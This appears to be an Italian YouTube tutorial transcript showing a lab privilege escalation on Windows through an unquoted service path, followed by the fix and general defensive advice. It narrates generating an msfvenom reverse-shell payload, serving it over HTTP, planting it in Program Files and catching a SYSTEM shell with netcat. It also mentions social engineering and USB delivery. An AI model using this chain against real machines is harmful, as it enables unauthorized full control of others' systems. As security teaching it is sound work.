Trovare una falla e mettere piede in un sistema è solo il 20% del lavoro, perché se sei dentro come utente standard, sei un fantasma. Non puoi toccare i file critici, non puoi cambiare le regole, non puoi fare niente. Ma bastano 3 secondi, un errore di configurazione e la privilege escalation per trasformarti da semplice utente ospite ad amministratore di sistema. Oggi vi mostro esattamente come demolire permessi su Linux e Windows nel nostro laboratorio. Mettetevi comodi e scaldate il terminale. Bene ragazzi, e ogni qualvolta si avvia la macchina Kali, come diciamo sempre con il nostro Gino, è bene aggiornare i pacchetti perché Kali sforna aggiornamenti ogni giorno e quindi con un update e upgrade diamo un invio, inseriamo la nostra password e mentre Kali aggiorna ragazzi vi voglio spiegare esattamente che cosa andremo a fare oggi. Quindi immaginate di essere entrati in un edificio privato, siete riusciti a superare la porta d'ingresso ma avete solo il badge per il ricevimento, quindi potete solamente guardarvi attorno e al massimo guardare qualche ufficio, quindi non entrare negli uffici. La privilege escalation è la tecnica che vi permette di rubare o falsificare il badge quindi del direttore generale per avere quindi accesso totale a ogni singola stanza dell'edificio. E quindi ci sono due tipi di privilege escalation. Abbiamo la privilege escalation orizzontale, dove passi da un utente standard ad un altro utente con gli stessi identici permessi, e questo serve per rubare dati specifici di quell'altro utente come per esempio email o file personali. E poi abbiamo la privilege escalation verticale, che sarebbe sostanzialmente il nostro focus. La verticale è passare da un utente standard con bassi permessi ad un utente con permessi di amministratore, quindi come utente root. E perché si fa questo? Per prendere il controllo totale e irreversibile della macchina. E perché una macchina si fa bucare in questo modo? Principalmente per 3 errori. Il primo è l'errore umano, il software non aggiornato e poi le credenziali hardware e software magari salvate all'interno del sistema. E quindi ragazzi, ora per fare un video comunque simile a un'infrastruttura aziendale stiamo simulando realmente una VM all'interno di un'azienda, ed effettivamente noi abbiamo ora la macchina Kali che effettuerà il nostro attacco, poi abbiamo il nostro target che è la macchina Windows 10, il quale è associata ad un dominio, ed effettivamente abbiamo la macchina Windows Server 2022 configurata come dominio.lab e l'utenza, come potete vedere, Gino. E quindi ora se io provo ad aprire il terminale come amministratore mi chiederà di inserire le credenziali di amministratore, quindi siamo a tutti gli effetti come utente standard. Per fare comunque tutte le verifiche del caso apriremo un terminale da utente standard, ci andremo a scrivere Wami e sappiamo che il nostro account attualmente è lab/Gino. Possiamo fare anche una controverifica, quindi vedere esattamente l'utenza Gino a che gruppo di dominio appartiene con net user Gino/domain, diamo un invio e come possiamo vedere il nome utente Gino, il nome completo Gino perché ancora non le abbiamo assegnato un cognome a questo bel polletto, e l'appartenenza al gruppo globale è domain user e quindi non è administrator. Ora fatto questo noi che cosa andremo a fare? Andremo a vedere esattamente l'utenza Gino quali privilegi da utente standard ha. Con il comando wami/priv vediamo esattamente che cosa può fare Gino e cosa non può fare. E come sappiamo Gino ha solamente abilitata una opzione, il resto è tutto disabilitato, e quindi per fare determinate modifiche come entrare nel registro di sistema, cambiare un indirizzo IP, entrare in una cartella diversa, insomma ci vogliono le credenziali di amministratore. Ora prima di procedere chiariamo una cosa, per mostrarvi questa tecnica, quindi questa privilege escalation verticale nel modo più pulito possibile, abbiamo creato questo servizio e l'abbiamo creato appositamente vulnerabile nella nostra VM, ma purtroppo non è un esempio inventato o surreale, perché questo è uno dei vettori di privilege escalation più famosi della storia di Windows, che ancora nel 2026 purtroppo esiste. E quindi con il comando wmix service get name display name pathname start mode fino alla cartella di sistema Windows e
alla fine le virgolette, diamo un invio e come possiamo vedere abbiamo tutti questi servizi. Bene, ora all'interno di tutti questi servizi abbiamo una falla di sicurezza e questa falla di sicurezza si trova all'ultima riga, che sarebbe la falla che abbiamo creato noi prima, e l'abbiamo chiamato Vulnerable Services. Sostanzialmente guardate l'output del nostro terminale: tra centinaia di servizi di sistema protetti alla fine ne spunta uno, Vulnerable Services. Il suo percorso è quindi c:/program file vulnerable app service.exe. Cosa notate? Bene, magari alcuni non possono notarlo subito, ma per comunque chi è leggermente più esperto ci sono gli spazi nel percorso, ma mancano le virgolette. Questo significa che Windows, per avviarlo, cercherà prima un file chiamato program.exe nella cartella di sistema, quindi in C, e se non lo trova cercherà vulnerable.exe dentro il C program file. E se noi, quindi da Kali, posizioniamo il nostro payload proprio all'interno di quella cartella Windows, il sistema lo eseguirà con i massimi privilegi di sistema. Immaginiamo ora uno scenario reale, un software di terze parti, quindi immaginate un'azienda che installa un software di gestione, per esempio di stampanti, lo sviluppatore di quel programma scrive il codice in maniera sbagliata e configura il servizio senza virgolette. Bene, quella è una falla di sicurezza. Anche l'installazione automatizzata, come per esempio l'IT manager dell'azienda oppure altri colleghi sempre IT, dove spingono l'installazione di questo programma su centinaia di PC tramite il servizio di Active Directory, il risultato? Centinaia di computer aziendali ora hanno questa bomba d'orologeria silenziosa all'interno. Bene, ora sappiamo che la nostra utenza Gino è vulnerabile. Con questo Vulnerable Services non faremo altro che chiudere il nostro terminale e spostarci sulla macchina Kali. Bene, questa sarà la nostra macchina di attacco. Innanzitutto andremo a prendere il nostro indirizzo IP. Vediamo che l'indirizzo IP è 192.168.172.128 e quindi ora con il comando msfvenom generiamo il nostro payload e per generare il nostro cavallo di Troia lo chiamiamo vulnerable.exe. Perché vulnerable.exe? Come abbiamo visto nella teoria, Windows, incontrando lo spazio in c:/program file/vulnerable app, proverà a eseguire qualsiasi file chiamato vulnerable.exe presente nella cartella program file. In questo caso aprirà con i permessi di amministratore il nostro payload. Bene, e quindi con il comando msfvenom-p windows/per64 una reverse shell sulla TCP come host, l'indirizzo IP di Kali è la porta 4x4, -f exe perché stiamo creando un payload per la macchina Windows chiamato vulnerable.exe, diamo un invio. E ora abbiamo il nostro cavallo di Troia. Non faremo altro che trasferirlo all'interno di una macchina Windows. E come si trasferisce all'interno di una macchina Windows? Ovviamente noi lo trasferiremo con un piccolo web server e quindi invece in uno scenario reale magari questo piccolo payload viene trasferito all'interno comunque tramite un attacco di social engineering oppure anche tramite un bypass USB se la persona che vuole attaccare si trova all'interno dell'azienda. Insomma, ci sono tanti metodi per trasferire un payload così piccolo che possa fare tanti danni. Quindi apriamo un altro terminale e con un Python 3 -m http.server spazio 80 apriamo questo web server sulla porta 80. Dopodiché ci spostiamo sulla macchina Windows 10 per il trasferimento file attraverso un piccolo web server. Come giusto che sia, il trasferimento tra macchina a macchina avviene con i privilegi massimi e quindi noi non faremo altro che aprire il nostro prompt come amministratore e quindi dare un invio e siamo direttamente come admin e inserire tutta questa riga di codice con l'indirizzo IP di Kali vulnerable.exe e non può mancare spazio virgolette c:/program file/vulnerable.exe chiuse virgolette. Questo perché oltre a scaricare il nostro payload lo trasportiamo direttamente all'interno della cartella di sistema e quindi diamo un invio e il file
file verrà scaricato e spostato all'interno della cartella c:\program file. Ora tecnicamente ragazzi la trappola è piazzata. Ora spostiamoci sulla macchina Kali, possiamo chiudere il nostro web server, riapriamo un altro terminale e con il comando nc-nvlp 4x4 andremo a mettere netcat in ascolto. Diamo un invio e lui rimarrà in ascolto. Bene, ora rispostiamoci all'interno della macchina Windows, chiudiamo il terminale. Per fare una prova non l'avviamo in manuale ma riavviamo la macchina, quindi facciamo un restart direttamente della macchina Windows. Facciamo l'accesso all'utenza Gino, quindi inseriamo la nostra password. In teoria il servizio che noi abbiamo creato a monte, quindi per far vedere questa vulnerabilità, l'abbiamo creata in automatico. Ciò significa che nel momento in cui si riavvia la macchina si riavvia anche questo servizio senza dare il comando a livello di terminale. E quindi ci spostiamo sulla macchina Kali e come potete vedere automaticamente, prima era solo in ascolto, abbiamo riavviato la macchina, il servizio si è rialzato in automatico e quindi ora siamo all'interno come utente amministratore. Ora facciamo un WAMI e autorità system. Quindi ragazzi, sostanzialmente che cosa è successo in questi 2-3 minuti? Windows ha provato ad avviare il servizio, ha trovato il nostro vulnerable.exe prima dell'eseguibile originale, quindi in questo caso ha trovato il nostro payload e lo ha lanciato con i permessi di amministratore. Non siamo quindi più un utente di dominio con restrizioni, ma ora siamo il sistema operativo. Inutile dirvi che dal mio terminale Kali ho il controllo pieno della macchina e quindi posso aprire una shell e fare quello che voglio. Ora ovviamente ragazzi ci tengo a precisare che abbiamo visto come effettuare una privilege escalation verticale, ma vi lascio anche al termine con la difesa, quindi come ci si difende da una privilege escalation di questo livello, perché comunque è un livello tecnicamente medio per non dire un po' basso, perché ci sono tecniche di privilege escalation verticali molto più ampie e molto più difficili da notare. Bene, ora come ci si difende da questa falla di sicurezza? Andiamo nel nostro Windows, apriamo il nostro terminale, rilanciamo il vmix service per vedere esattamente la nostra vulnerabilità, andremo alla ricerca del nostro vulnerable services e comunque dovrebbe essere salito perché è un servizio avviato in automatico, quindi non si trova più sotto ma si trova da qualche parte qui ed eccolo qui. Abbiamo il vulnerable services, tutta questa stringa. Bene, notate qualcosa? Come abbiamo detto, rispetto agli altri comunque servizi, questo servizio su vulnerable app/services.exe non ha le virgolette. Ora per fixare non faremo altro che aprire un terminale come amministratore, essendo comunque noi di difesa informatica, e quindi ora sto cercando di fixare questo problema ad un utente. Se sono bravo intuisco il problema, quindi dico ok, c'è questa vulnerabilità, c'è questo diciamo percorso senza virgolette, un po' strano perché qualsiasi percorso è con le virgolette, quindi non faremo altro che riscrivere o meglio riconfigurare questo vulnerable services con le virgolette in apertura e in chiusura. Ora, una volta fatto questo, diamo un invio e ovviamente il servizio è cambiato. Ora, avendo fatto il fix, ragazzi, non faremo altro che spostarci sulla macchina Kali, usciamo dal nostro ascolto, ritorniamo ad ascoltare sulla porta 4444 perché comunque il payload è ancora all'interno della macchina Windows. Ovviamente lui non si sta collegando perché il servizio è riparato e quindi come abbiamo fatto prima chiudiamo tutte le finestre, riavviamo la macchina. Prima, una volta effettuati il login, subito il servizio è partito e abbiamo avuto una bella shell pronta dalla parte di Kali. Ora siamo nella schermata di login, come potete vedere il nostro payload è ancora in ascolto, facciamo l'accesso, all'interno della nostra macchina non sembrerebbe esserci nessun problema, torniamo sulla macchina Kali e come potete vedere il payload è ancora in ascolto e quindi
ragazzi, vuol dire che il nostro fix è andato a buon fine. E questo perché? Perché avendo inserito le virgolette, Windows ha ignorato completamente il nostro file trappola ed è andato ad eseguire direttamente l'applicazione legittima dentro la sottocartella. Quindi possiamo dire che questa falla è chiusa con successo. Un bravo pentester o un bravo sysadmin, quando succedono queste cose a livello di privilege escalation, perché comunque chi gestisce l'infrastruttura a monte comunque vede che ci sono comportamenti anomali all'interno della macchina, perché riceve comunque degli alert, la cosa che fa è analizzare la problematica e poi aprire il prompt come amministratore. Una volta trovata la falla, dire cancella questo vulnerable.exe direttamente dalla cartella di sistema con un del il percorso, da un invio, e quindi automaticamente all'interno della cartella program file, come potete vedere, c'è solamente la vulnerable app come comunque cartella creata, ma il file all'interno non c'è perché è stato letteralmente eliminato. Possiamo chiudere il nostro netcat perché non serve più a nulla, e quindi abbiamo visto quanto è devastante questa vulnerabilità e come si risolve con un fix veramente banale, con delle semplici virgolette in apertura e in chiusura. In questo modo quindi che cosa diciamo a Windows? Considera tutto questo blocco come un unico percorso e non fermarti a cercare file intermedi negli spazi, in questo caso il nostro payload. E quindi le 3 regole d'oro per la difesa, per le aziende, ma anche per comunque i piccoli utenti, non è altro che il principio di last privilege, quindi minimo privilegio, non dare mai a gruppi user i permessi di scrittura in cartelle critiche come per esempio il program file, l'hardening delle configurazioni, quindi utilizzare script di audit automatizzati per scansionare periodicamente i servizi del dominio e rilevare percorsi non tecnicamente virgolettati, usare come al solito un EDR o antivirus moderni, che non siano, ragazzi, antivirus gratuiti, mi raccomando. Un buon software di protezione rileva subito la creazione di un file .exe insolito dentro una cartella di sistema come program file ed evita che il servizio lo esegua. E questo, ragazzi, è il potere della privilege escalation. Una semplice virgoletta dimenticata da uno sviluppatore o da un dominio Active Directory nelle mani di un attaccante. E quindi se il video vi è piaciuto, ragazzi, come diciamo sempre io e Gino, lasciate un like e iscrivetevi al canale e ricordate, restate sicuri, restate curiosi e restate invisibili.